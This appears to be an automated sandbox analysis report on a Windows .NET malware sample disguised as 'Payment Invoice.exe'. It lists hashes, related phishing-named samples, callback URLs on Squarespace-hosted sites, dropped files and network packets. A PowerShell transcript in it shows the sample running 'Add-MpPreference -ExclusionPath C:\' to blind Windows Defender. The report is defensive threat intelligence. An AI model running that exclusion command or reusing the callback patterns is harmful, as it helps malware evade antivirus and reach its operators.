                                                    • www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV
                                                    RCS76393.exeGet hashmaliciousBrowse
                                                    • www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
                                                    PO4308.exeGet hashmaliciousBrowse
                                                    • www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
                                                    TazxfJHRhq.exeGet hashmaliciousBrowse
                                                    • www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
                                                    Order Inquiry.exeGet hashmaliciousBrowse
                                                    • www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                    • www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
                                                    SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                    • www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
                                                    New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                    • www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
                                                    New Month.exeGet hashmaliciousBrowse
                                                    • www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
                                                    QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                    • www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
                                                    new built.exeGet hashmaliciousBrowse
                                                    • www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
                                                    Invoice.xlsxGet hashmaliciousBrowse
                                                    • www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    ext-cust.squarespace.comsgJRcWvnkP.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    remittance info.xlsxGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    NEW ORDER ELO-05756485.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    RCS76393.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO4308.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO#41000055885.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    SHIPPING DOCUMENTS.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    invoice bank.xlsxGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    UAE MINISTRY OF HEALTH MEDICAL EQUIPMENT SUPPLY TENDER.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    Scan copy 24032021_jpeg.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO032321.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    Copia De Pago_pdf.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    V90Y4n0acH.exeGet hashmaliciousBrowse
                                                    • 198.185.159.145
                                                    Dgm2Yseey2.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    winlog.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    payment slip_pdf.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    wFzMy6hehS.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    ffOWE185KP.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    SQUARESPACEUSINQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    remittance info.xlsxGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    36ne6xnkop.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    mW07jhVxX5.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    NEW ORDER ELO-05756485.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    RCS76393.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO4308.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    TazxfJHRhq.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    Order Inquiry.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    PO#41000055885.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • 198.49.23.144
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                    • 198.49.23.145
                                                    New PO#700-20-HDO410444RF217,pdf.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144
                                                    New Month.exeGet hashmaliciousBrowse
                                                    • 198.185.159.144

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Invoice.exe.log
                                                    Process:C:\Users\user\Desktop\Payment Invoice.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):1119
                                                    Entropy (8bit):5.356708753875314
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzd
                                                    MD5:3197B1D4714B56F2A6AC9E83761739AE
                                                    SHA1:3B38010F0DF51C1D4D2C020138202DABB686741D
                                                    SHA-256:40586572180B85042FEFED9F367B43831C5D269751D9F3940BBC29B41E18E9F6
                                                    SHA-512:58EC975A53AD9B19B425F6C6843A94CC280F794D436BBF3D29D8B76CA1E8C2D8883B3E754F9D4F2C9E9387FE88825CCD9919369A5446B1AFF73EDBE07FA94D88
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):14734
                                                    Entropy (8bit):4.996142136926143
                                                    Encrypted:false
                                                    SSDEEP:384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
                                                    MD5:B7D3A4EB1F0AED131A6E0EDF1D3C0414
                                                    SHA1:A72E0DDE5F3083632B7242D2407658BCA3E54F29
                                                    SHA-256:8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
                                                    SHA-512:F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):22148
                                                    Entropy (8bit):5.602144632803491
                                                    Encrypted:false
                                                    SSDEEP:384:MtCDLTTnRUBZ60Xb1YSBKnuultIti7Y9gNSJUeRS1BMrmLZ1AV7ObWQ+64I+iNq:uIO24KuultS2NXexa46gp
                                                    MD5:337D36F8B0DFD690717566FD034ECBDA
                                                    SHA1:E28D1BC9D0C05DB111D21B9B56E12C340312E2D2
                                                    SHA-256:0D9E00432D965BE17ED8B482C9A1490595DE1D653B44F085269629F910490E62
                                                    SHA-512:1FF178EAC94BE9B5DAB1D47E1AB6C07298A76301A2C058B1215E4CD78E0D45905FA1E07BBBFCFA2903DE62DFC87F177948B7A3D59B96610B7CBDAEB58A356A26
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview: @...e...........Y.......................1............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                    C:\Users\user\AppData\Local\Temp\Payment Invoice.exe
                                                    Process:C:\Users\user\Desktop\Payment Invoice.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):669184
                                                    Entropy (8bit):7.3745607474678545
                                                    Encrypted:false
                                                    SSDEEP:12288:5NkKNu55RIPDQRPo1eviHXJgoYcgMuwS2T8Xo2i10OlYa:5qKvPDQpweiXJ3YxFWgXhr
                                                    MD5:EBFEAA73811B084FF7EC882503205988
                                                    SHA1:893E9FD1B6F1CCB56DBC389799B93ECBF116EE74
                                                    SHA-256:BDE02A4B70A0070B28F0E812F6F7A857F2D57E2C8B6F3D0F11C9BB6A66CDC05A
                                                    SHA-512:7EBB8A1ACE821C96A3BFB2F1FB3681CC7E3D2B05A6AB9D43836480FA33E6E6591A5486BD87AA61EA2CAEF4FF2530DE79F9BFCF1E8967D043C067B24CDD2CFD75
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Reputation:low
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`................................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc...............4..............@..B........................H............5......a....I...M...........................................(....(&...*.*..z.(......}.....(....o....}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X ...Q.{....Xa}......}.....{....oq...:q....(....+..(........}.........(......*................n..}.....{....,..{....o.
                                                    C:\Users\user\AppData\Local\Temp\Payment Invoice.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\Payment Invoice.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fadwgx3r.s0c.ps1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kjrrcpza.p2b.psm1
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview: 1
                                                    C:\Users\user\Documents\20210412\PowerShell_transcript.928100.nThv75WD.20210412143952.txt
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):5048
                                                    Entropy (8bit):5.379411003713336
                                                    Encrypted:false
                                                    SSDEEP:96:BZyjGN5yqDo1ZrZpjGN5yqDo1ZXM6UjZ5AjGN5yqDo1ZmFEEjZc:Jl7I
                                                    MD5:8ADE5B7E77BEE476B7AF344E622A0DC6
                                                    SHA1:5008794A9D51EBE326E921D646C2FCC402CB33B3
                                                    SHA-256:3430F2A5985A82FB63F3D976729F5956ED7E7CE817CA18FA7CC828E01BFC65EE
                                                    SHA-512:52A451514B5FE6418176A9B959964BA3266D6306EC848B943821A31FE162AB25481163B0EBE0373A02B6223711B56287CD6CADD14B796D5FDD78DEEA5995BCD5
                                                    Malicious:false
                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210412144009..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -ExclusionPath C:\..Process ID: 6680..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210412144009..**********************..PS>Add-MpPreference -ExclusionPath C:\..**********************..Windows PowerShell transcript start..Start time: 20210412144312..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell Add-MpPreference -Exclus

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.3745607474678545
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:Payment Invoice.exe
                                                    File size:669184
                                                    MD5:ebfeaa73811b084ff7ec882503205988
                                                    SHA1:893e9fd1b6f1ccb56dbc389799b93ecbf116ee74
                                                    SHA256:bde02a4b70a0070b28f0e812f6f7a857f2d57e2c8b6f3d0f11c9bb6a66cdc05a
                                                    SHA512:7ebb8a1ace821c96a3bfb2f1fb3681cc7e3d2b05a6ab9d43836480fa33e6e6591a5486bd87aa61ea2caef4ff2530de79f9bfcf1e8967d043c067b24cdd2cfd75
                                                    SSDEEP:12288:5NkKNu55RIPDQRPo1eviHXJgoYcgMuwS2T8Xo2i10OlYa:5qKvPDQpweiXJ3YxFWgXhr
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t`................................. ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:206ae682a280a906

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x47cbe6
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x60740DFE [Mon Apr 12 09:08:14 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x7cb8c0x57.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000x284fc.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000x7abec0x7ac00False0.97593002164data7.98286833797IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0x7e0000x284fc0x28600False0.0286861455108data3.19160978616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xa80000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_ICON0x7e2b00x4f2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    RT_ICON0x7e7a40x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 4278496986, next used block 4278496986
                                                    RT_ICON0x8efcc0x94a8data
                                                    RT_ICON0x984740x5488data
                                                    RT_ICON0x9d8fc0x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
                                                    RT_ICON0xa1b240x25a8data
                                                    RT_ICON0xa40cc0x10a8data
                                                    RT_ICON0xa51740x988data
                                                    RT_ICON0xa5afc0x468GLS_BINARY_LSB_FIRST
                                                    RT_GROUP_ICON0xa5f640x84data
                                                    RT_VERSION0xa5fe80x360data
                                                    RT_MANIFEST0xa63480x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2020
                                                    Assembly Version1.0.0.0
                                                    InternalNameMstkztz.exe
                                                    FileVersion1.0.0.0
                                                    CompanyName
                                                    LegalTrademarks
                                                    CommentsExcel Macro Exploit
                                                    ProductNameExcel Macro Exploit
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionExcel Macro Exploit
                                                    OriginalFilenameMstkztz.exe

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Apr 12, 2021 14:41:19.252121925 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.382915020 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.383065939 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.383213043 CEST4976080192.168.2.4198.185.159.144
                                                    Apr 12, 2021 14:41:19.513685942 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516170025 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516197920 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516222954 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516244888 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516259909 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516278028 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516295910 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516311884 CEST8049760198.185.159.144192.168.2.4
                                                    Apr 12, 2021 14:41:19.516326904 CEST8049760198.185.159.144192.168.2.4
